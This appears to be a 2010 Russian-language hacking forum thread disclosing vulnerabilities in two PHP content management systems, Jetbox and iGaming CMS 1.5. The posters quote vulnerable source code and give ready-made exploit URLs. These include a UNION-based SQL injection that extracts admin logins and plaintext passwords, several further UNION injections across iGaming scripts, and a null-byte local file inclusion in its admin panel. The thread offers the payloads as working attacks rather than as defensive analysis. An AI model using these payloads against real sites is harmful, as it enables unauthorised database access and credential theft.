$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC";
}
#echo $sqlselect1;
$result1 = mysql_prefix_query ($sqlselect1) or die (mysql_error());
$blogscount= mysql_num_rows($result1);
if ($blogscount>'0') {
$view_tpl = new Template("./");
$view_tpl->set_file("block", "blogs_item_tpl.html");
$view_tpl->set_block("block", "blogs","blogsz");
$view_tpl->set_var(array("absolutepathfull"=>$absolutepathfull ));
while ($resultarray = mysql_fetch_array($result1)){
$records[1][5]=$resultarray["b_id"];
ob_start();
loggedin_workflow();
$containera = ob_get_contents();
ob_end_clean();
...
if ($item<>'' && is_numeric($item)) {
//$t->set_var("containera", "add comments", true);
$sqlselect1 = "SELECT * FROM blog_comments WHERE blog_id=".$id." ORDER BY blog_comments.c_id ASC";
$result1 = mysql_prefix_query($sqlselect1) or die (mysql_error());
$blog_commentcount= mysql_num_rows($result1);
if ($blog_commentcount>'0') {
$view_tpl2 = new Template("./");
$view_tpl2->set_file("block", "blog_comment_item_tpl.html");
$view_tpl2->set_block("block", "blog_comment","blog_commentz");
...
SQL
rg=on
http://localhost/jetbox/index.php?view=blog&item=1&id=1+union+select+1,2,u ser_password,4,5,type,user_password+from+user+--+
http://localhost/jetbox/view/blog/item/1/id/1+union+select+1,2,user_password,4,5,type,user_pas sword+from+user+--+
Работает, если в блоге есть хотя бы одна запись.
Получаем логин и пароль (не хеш) от админки.
Последний раз редактировалось nikp; 25.02.2010 в 08:57..
|
|
|
|
26.02.2010, 15:19
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
iGaming
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com SQL injection
mq=off
games.php
PHP код:
$sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` ";
if (!empty($_REQUEST['title'])) {
$sql .= "WHERE `title` LIKE '$_REQUEST[title]%' ";
if (!empty($_REQUEST['section'])) {
$sql .= " AND `section` = '$_REQUEST[section]' ";
}
$sql .= " AND `published` = '1' ";
} else {
if (!empty($_REQUEST['section'])) {
$sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' ";
} else {
$sql .= "WHERE `published` = '1' ";
...
if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC")
Код:
http://localhost/games.php?order=genre§ion=%27+and+1=0+union+all+select+1,version%28%29,3,4,5,6,7--+&sort=
index.php
Код:
http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9--+
previews.php
PHP код:
$preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'");
Код:
http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+
Admin Panel (SQL inj) (LFI)
LFI : support.php
PHP код:
require_once("../sources/docs/$_REQUEST[id].php");
Код:
http://localhost/admin/support.php?id=../../file%00
SQL injection : screenshots.php
mq=off
PHP код:
if (isset($_REQUEST['s'])) {
$latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC");
Код:
http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,version(),3--+
Последний раз редактировалось [x60]unu; 26.02.2010 в 18:11..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
Похожие темы
Линейный вид
